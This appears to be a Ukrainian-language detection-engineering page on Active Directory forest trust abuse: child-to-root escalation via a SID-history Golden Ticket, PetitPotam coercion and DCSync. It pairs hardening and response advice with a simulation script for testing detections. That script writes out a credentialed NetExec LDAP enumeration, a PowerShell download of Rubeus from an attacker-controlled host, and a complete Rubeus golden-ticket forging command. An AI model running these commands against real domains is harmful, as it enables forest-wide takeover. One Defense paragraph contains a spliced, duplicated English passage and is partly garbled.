SOC Prime Bias: Критичний

01 Jul 2026 09:11 UTC

Зловживання довірою лісу Active Directory та підвищення від дитини до кореня

Author Photo
SOC Prime Team linkedin icon Стежити
Зловживання довірою лісу Active Directory та підвищення від дитини до кореня
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Цей технічний гайд демонструє, як зловмисник з привілеями адміністратора домену в дочірньому домені може підвищити свої права до адміністративного контролю над коренем лісу. Атака використовує двонаправлені внутрішні довірчі відносини в лісі та поблажливу SID фільтрацію для ін’єкції SID підприємства адміністратора в підроблені квитки Kerberos. Також пояснюється, як методи примусу, такі як PetitPotam, можуть бути використані для захоплення квитків машинних облікових записів і здійснення атак DCSync.

Дослідження

Звіт описує лабораторну взаємодію, в якій зловмисник починає в pentest.ignite.local дочірньому домені. Робочий процес включає перерахунок довірянь лісу, витяг хешу krbtgt підробку Золотого квитка з історією SID і виконання атаки DCSync проти батьківського ignite.local домена. Продемонстровано також вторинний шлях підвищення прав за допомогою техніки примусу PetitPotam.

Захист

Рекомендовані заходи безпеки включають обробку всіх контролерів домену як активи нульового рівня і регулярну зміну паролів двічі в лісі. Організації повинні запровадити фільтрацію SID на довірчі відносини, вимкнути необмежені делегування і відключити службу друку на контролерах домену. Додаткові кроки включають використання групи Захищених Користувачів для захисту Kerberos і моніторинг аномальної активності реплікації DRSUAPI. хешу krbtgt password twice on a regular basis across the forest. Organizations should enforce SID filtering on trusts, disable unconstrained delegation, and turn off the Print Spooler service on domain controllers. Additional hardening steps include using the Protected Users group for Kerberos protection and monitoring for abnormal DRSUAPI replication activity.

Відповідь

Якщо виявлено активність DCSync або несанкціоноване використання квитків Kerberos, відповідачі повинні негайно ізолювати уражені контролери домену і розпочати подвійне скидання хешу krbtgt пароля. Слід розслідувати всі облікові записи з привілеями адміністратора підприємства, а навколишнє середовище слід перевірити на інструменти, такі як Rubeus або PetitPotam. Журнали аутентифікації також потрібно перевіряти на предмет незвичайної поведінки машинних облікових записів і можливих подій, пов’язаних з примусом.

Потік атаки

Виконання симуляції

Передумова: Перевірка телеметрії та базового рівня повинна бути пройдена.

Розуміння: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати виявлені TTP та мати на меті генерувати точну телеметрію, яку очікує логіка виявлення. Абстрактні або невідповідні приклади призведуть до помилкової діагностики.

  • Атака та Команди: Зловмисник отримав закріплення в дочірньому домені (pentest.ignite.local). Щоб підвищити права до кореня лісу, спочатку використовують nxc (NetExec) для перелічення Контролерів Домена через LDAP з метою мапування цільового середовища. Далі використовують PowerShell для завантаження Rubeus.exe з віддаленого сервера, контрольованого зловмисником. Нарешті, вони виконують Rubeus.exe для підробки Золотого Квитка. Підроблений квиток містить SID домена кореня лісу (S-1-5-21-2964257136-1039789743-457275023) щоб дозволити зловмиснику вдавати адміністратора лісу під час взаємодії з кореневим доменом.

  • Сценарій Регресійних Тестів:

    # Симуляція зловживання довірою в лісі для виклику специфічного правила Sigma
    
    # 1. Симуляція переліку LDAP через NetExec
    # Примітка: Ми викликаємо 'nxc' через уявне виконання для імітації підпису командного рядка
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Симуляція завантаження Rubeus через PowerShell
    # Це відповідає точному рядку: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Симуляція підробки Золотого Квитка Rubeus
    # Це відповідає точному складному рядку, необхідному для правила виявлення
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • Команди очистки:

    # Видалення завантаженого файлу Rubeus і будь-яких уявних артефактів
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue